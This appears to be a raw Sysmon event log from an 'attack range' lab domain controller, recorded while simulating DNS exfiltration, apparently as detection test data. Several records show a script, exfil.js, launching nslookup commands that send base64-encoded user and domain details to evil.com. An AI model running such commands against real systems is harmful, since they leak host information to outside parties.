14:16:22.821{2E1864BB-17B6-629A-633F-000000005F02}56884672C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-643F-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-643F-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.805{2E1864BB-17B6-629A-623F-000000005F02}74882236C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-643F-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.819{2E1864BB-17B6-629A-643F-000000005F02}7836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-623F-000000005F02}7488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfqtkb.tmp 2>&1 10341000x8000000000000000197851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.790{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-633F-000000005F02}5688C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.790{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-633F-000000005F02}5688C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.787{2E1864BB-17B6-629A-633F-000000005F02}56884672C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-623F-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.769{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-633F-000000005F02}5688C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-623F-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-17A1-629A-783D-000000005F02}55525740C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-623F-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.746{2E1864BB-17B6-629A-623F-000000005F02}7488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfqtkb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.738{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjeefe.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.668{2E1864BB-17B6-629A-603F-000000005F02}79961276C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-613F-000000005F02}7704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-613F-000000005F02}7704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.652{2E1864BB-17B6-629A-5F3F-000000005F02}68566660C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-613F-000000005F02}7704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.662{2E1864BB-17B6-629A-613F-000000005F02}7704C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-5F3F-000000005F02}6856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjeefe.tmp 2>&1 22542200x8000000000000000197831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{00000000-0000-0000-0000-000000000000}2604evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.813{00000000-0000-0000-0000-000000000000}1736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.659{00000000-0000-0000-0000-000000000000}7536evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.584{00000000-0000-0000-0000-000000000000}7236evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.498{00000000-0000-0000-0000-000000000000}1700evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000197826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.622{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-603F-000000005F02}7996C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.622{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-603F-000000005F02}7996C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 